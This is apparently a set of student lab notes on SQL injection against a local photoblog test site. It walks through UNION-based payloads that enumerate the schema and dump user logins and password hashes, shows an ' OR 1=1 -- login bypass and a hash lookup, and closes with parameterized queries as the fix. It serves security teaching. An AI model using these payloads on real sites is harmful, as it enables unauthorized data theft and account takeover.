0% found this document useful (0 votes)
12 views24 pages

SQL Injection Quick Notes

Uploaded by

maaryamrh
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
12 views24 pages

SQL Injection Quick Notes

Uploaded by

maaryamrh
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 24

1

SQL INJECTION QUICK NOTES

WORKING WITH BACK END DATABASE:


mysql -u root Connects to MySQL database management system.

show databases; Show databases

use photoblog; Select photoblog database

show tables; Show tables

select * from users; Show "users" table content


2

select * from pictures; Show "pictures" table content

show columns from users; Show users table structure

show columns from pictures; Show pictures table structure


3

select * from pictures union select * from Show an error the two select queries have different number of columns;
users;

select title from pictures union select login Show column title from pictures concatenated with column login from users
from users;

Select title,img from pictures union select Show columns title,img from pictures concatenated with columns login,password
login,password from users; from users
4

Quit Quits mysql


Ifconfig Get IP address

WORKING WITH FRONT END WEB SITE:


In what follows, replace the IP address by
your machine IP address.
http://192.168.1.144/cat.php?id=1 ===> select * from pictures where cat=1
==> Show pictures of category 1
5

http://192.168.1.144/cat.php?id=2 ===> select * from pictures where cat=2


==> Show other pictures of category 2
6

http://192.168.1.144/cat.php?id=2% ===> select * from pictures where cat=2%


==> Show Error

http://192.168.1.144/cat.php?id=2-1 ===> select * from pictures where cat=2-1


==> Show pictures of category 1
7

http://192.168.1.144/cat.php?id=1+1 ===> select * from pictures where cat=1 + 1


==> Show Error
8

===> select * from pictures where cat=1 union select 1


==> Show error as number of columns in the left select statement is different from
the right select statement

http://192.168.1.144/cat.php?id=1 union ===> select * from pictures where cat=1 union select 1,2
select 1,2 ==> Show error as number of columns in the left select statement is different from
the right select statement

http://192.168.1.144/cat.php?id=1 union ===> select * from pictures where cat=1 union select 1,2,3
select 1,2,3 ==> Show error as number of columns in the left select statement is different from
the right select statement
9

http://192.168.1.144/cat.php?id=1 union ===> select * from pictures where cat=2 union select 1,2,3,4
select 1,2,3,4 ==> no error, the left select statement have 4 columns.
Also, image and image title are coming from column number 2 in the left and right
select statements.
Hacker could use column number 2 as input in the URL, and output in the page for
SQL Injection scripts.
10

http://192.168.1.144/cat.php?id=1 union Show mysql version


select 1,@@version,3,4
11

http://192.168.1.144/cat.php?id=1 union Show current mysql user


select 1,current_user(),3,4
12

http://192.168.1.144/cat.php?id=1 union Show current used database: photoblog.


select 1,database(),3,4
13

http://192.168.1.144/cat.php?id=1 union Show all tables names used in mysql DBMS.


select 1,table_name,3,4 from We clearly see the database tables: categories, pictures and users.
information_schema.tables
14

192.168.1.144/cat.php?id=1union select Show all tables column names used in mysql DBMS.
1,column_name,3,4 from We clearly see the columns: login, password which belongs to the table users.
information_schema.columns
15

http://192.168.1.144/cat.php?id=1 union The hacker could get user login easily.


select 1,login,3,4 from users
16

http://192.168.1.144/cat.php?id=1 union The hacker could get user password easily. Here the password is encrypted.
select 1,password,3,4 from users
17

http://192.168.1.144/cat.php?id=1 union The hacker could get user login and password easily. Here the password is
select 1,concat(login, %27:%27, encrypted.
password),3,4 from users
18
19

Enter website www.md5online.org, and try


to decrypt the encrypted password.

The password is "P4ssw0d"


20

SIMPLE EXERCICE:
In the following section. We will create our own table, and try to hack it.

mysql -u root Connects to MySQL database management system.

use photoblog; Select photoblog database

CREATE TABLE employee (employee_name Creates the table employee.


varchar(250), employee_job varchar(250));

INSERT INTO employee (employee_name, Insert first record to employee table.’


employee_job) VALUES ('Ali Baba', 'cartoon');

INSERT INTO employee (employee_name, Insert second record to employee table.


employee_job) VALUES ('Samir Sabri', 'actor');

SELECT * from employee; View employee table content.


21

Go back to the browser and continue.


http://192.168.1.144/cat.php?id=1 union select Show employee names.
1,employee_name,3,4 from employee
22

http://192.168.1.144/cat.php?id=1 union select Show employee names and jobs.


1,concat(employee_name,
%27:%27,employee_job),3,4 from employee
23
24

Hacking techniques over login page:

If you enter login=jsmith and password=demo1234, your query become in the back end:

SELECT * from users where login='jsmith' and password='demo1234';

If you enter login=' and password=a, your query become in the back end:

SELECT * from users where login=''' and password='a';

If you enter login=' OR 1=1 -- and password=demo1234, your query become in the back end:

SELECT * from users where login='' OR 1=1 --' and password='demo1234';

Parametrized queries:

query = "SELECT * FROM USERS WHERE LOGIN =? and password =?";

pstmt.setparameter(1, "’ OR 1=1 --");

pstmt.setparameter(2, "demo1234");

===> SQL will search for users with login =’ OR 1=1 -- and password=demo1234. The injected script will not be considered as part of the SQL
statement.

You might also like